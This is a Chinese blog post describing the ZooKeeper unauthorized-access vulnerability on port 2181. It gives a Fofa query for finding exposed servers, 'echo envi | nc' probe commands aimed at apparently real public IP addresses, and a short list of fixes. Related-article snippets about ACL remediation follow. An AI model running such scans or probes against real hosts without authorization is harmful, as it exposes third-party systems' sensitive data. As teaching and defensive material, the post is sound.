Zookeeper未授权访问漏洞

最新推荐文章于 2024-08-28 10:57:06 发布
最新推荐文章于 2024-08-28 10:57:06 发布
阅读量242 收藏
点赞数 3
文章标签: zookeeper 分布式 云原生
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71053667/article/details/140910003
版权

1.Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是 2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:ki命令)。攻击者能够执行所有只允许由管理员运行的命令。

步骤一:使用以下Fofa语法搜索资产信息.

port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试

echo envi | nc 114.242.175.75 2181
echo envi | nc 223.5.253.242 2181

 步骤三:可使用Zookeeper可视化管理工具进行连接.

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

》》》漏洞修复《《《
1.修改 ZooKeeper 默认端口,采用其他端口服务。
2.添加访问控制,配置服务来源地址限制策略。
3.增加 ZooKeeper 的认证配置。

Zookeeper授权访问漏洞修复
码农养家
09-18 950
Zookeeper授权访问漏洞修复
复现CVE-2014-085(Apache ZooKeeper 授权访问漏洞
记录并分享学习安全的知识点..
09-26 1379
默认安装配置完的zookeeper允许授权访问,管理员配置访问控制列表(ACL)。导致攻击者可以在默认开放的2181端口下通过执行envi命令获得大量敏感信息(系统名称、java环境)导致任意用户可以在网络不受限的情况下进行授权访问读取数据。
zookeeper授权访问修复建议
07-14
zookeeper授权访问修复建议
ZooKeeper通过ACL修复授权访问漏洞
05-06
ZooKeeper通过ACL修复授权访问漏洞,此文档适合学习
Zookeeper授权访问漏洞处理
最新发布
Jeuneke的博客
08-28 746
这个命令可以用于获取Zookeepr(下面有zk代替)目标服务器的环境信息、部署路径、版本等敏感信息。如果这些信息被恶意利用,确实可能导致安全漏洞,进而对网络和服务器安全构成威胁。设置权限后,不同的IP服务器还是能访问到,zookeeper相应的路径,版本,还是有安全隐患.1.执行zkCli.sh 命令后,查看zk的当前权限。配置防火墙策略,只允许指定IP访问2181端口。anyone任何人可以访问
授权访问ZooKeeper 授权访问漏洞
qq_68163788的博客
05-15 3021
zookeeper分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。 Zookeeper的默认开放端口是2181。 Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。
ZooKeeper 授权访问漏洞
xiexiaoming052的博客
11-20 5229
ZooKeeper默认开启在2181端口,在进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。 0x00 ZooKeeper 安装: Zookeeper的默认开放端口是2181 wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz tar -zxvf zookeepre-3.4.10.tar.gz cd zo
ZooKeeper 授权访问漏洞处理方法
08-31
### ZooKeeper 授权访问漏洞处理方法 #### 一、漏洞背景及原理 **ZooKeeper** 是一个分布式的协调服务框架,它提供了一种高效可靠的解决方案来管理和维护分布式环境中不同节点之间的同步与协调问题。然而,由于...
zookeeper授权访问漏洞处理
weixin_50016127的博客
06-27 1万+
zookeeper授权访问漏洞处理
Apache Zookeeper授权访问漏洞
q80880117的博客
07-11 881
CREATE、READ、WRITE、DELETE、ADMIN 也就是 增、删、改、查、管理权限,这5种权限简写为crwda(即:每个单词的首字符缩写)格式:setAcl 路径 ip:xxx.xxx.xxx.xx1:cdrwa,ip:xxx.xxx.xxx.xx2:cdrwa。例如:setAcl /zkaa ip:127.0.0.1:cdrwa,ip:10.111.134.6:cdrwa。注:这5种权限中,delete是指对子节点的删除权限,其它4种权限指对自身节点的操作权限。
ZooKeeper 授权访问漏洞利用
tangshuangsss的专栏
12-21 7793
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,它是一个为分布式应用提供一致性服务的软...
ZooKeeper 授权访问
热门推荐
ziruominglin的专栏
05-21 1万+
第一步:cd到zookeeper的bin目录下执行: ./zkCli.sh -server localhost:2181第二步:点击回车后,查看节点路径(例如查到的是dubbo): ls /第三步:创建用户:addauth digest test:test123第四步:追加操作权限(/dubbo是第二步查到的):setAcl /zookeeper auth:test:test123:cdrwa第五...
zookeeper授权访问漏洞
05-01
然而,在使用Zookeeper时,存在一个授权访问漏洞。这个漏洞可以让攻击者通过授权的方式获取Zookeeper的敏感信息,从而导致系统的失效和安全性问题。 当攻击者利用这个漏洞时,他们可以轻松地访问Zookeeper...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值